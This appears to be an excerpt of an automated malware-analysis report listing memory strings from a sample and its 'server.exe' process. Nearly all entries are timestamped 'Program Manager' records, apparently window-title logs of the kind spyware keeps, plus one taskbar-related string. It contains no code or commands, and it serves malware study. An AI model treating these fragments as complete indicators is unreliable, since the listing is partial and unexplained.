          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 13:52:06 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 22:36:42 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 12:00:16 - Program Manager
          Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000602000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Shell_traywnd+MostrarBarraDeTarefas
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 15:07:13 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/30 | 04:30:50 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 21:41:25 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 23:09:22 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 20:19:44 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 01:35:55 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 05:13:15 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 14:53:37 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 00:31:36 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 14:41:04 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/07/25 | 07:57:45 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 13:45:44 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 11:08:40 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 17:42:08 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 01:31:59 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 19:39:21 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 07:09:14 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/19 | 22:56:11 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 15:08:07 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 11:17:14 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 00:38:17 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 12:47:44 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 06:12:44 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 22:38:57 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 07:41:58 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 06:56:48 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/19 | 23:52:50 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 01:40:25 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 08:01:04 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 15:09:56 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/30 | 06:15:21 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 14:21:55 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 07:14:57 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 13:12:35 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 00:32:21 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 18:28:08 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 02:07:55 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 13:30:23 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 19:42:38 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 07:00:10 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 06:42:21 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 23:09:49 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 06:56:55 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 08:22:08 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 08:30:56 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 00:01:06 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 02:31:12 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/19 | 23:06:05 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 06:31:15 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 20:37:32 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 03:32:51 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 14:52:51 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 00:52:29 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 18:25:57 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 03:04:20 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 18:05:43 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/30 | 05:52:17 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 21:25:42 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/09 | 14:41:50 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 04:20:12 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 18:05:03 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/07/27 | 13:59:49 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 09:47:20 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 00:19:56 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/20 | 00:12:12 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 07:44:25 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 21:30:05 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 05:36:12 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 08:01:34 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 13:28:34 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 15:17:14 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 13:09:01 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 21:13:16 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 21:24:47 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 00:25:47 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 02:38:27 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 00:47:56 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 22:21:26 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 07:13:08 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 23:13:44 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 08:19:48 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 11:13:15 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/28 | 00:36:35 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 15:20:03 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 01:31:28 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 14:56:03 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 14:36:04 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 08:32:17 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 13:56:53 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 14:28:31 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 03:59:18 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 12:04:59 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 02:37:14 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 22:35:43 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 04:13:36 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 18:17:39 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 11:35:07 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 16:25:41 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 04:34:33 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 06:26:38 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 20:27:58 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 23:50:50 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 12:06:13 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 06:07:15 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 10:55:43 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 12:42:07 - Program Manager
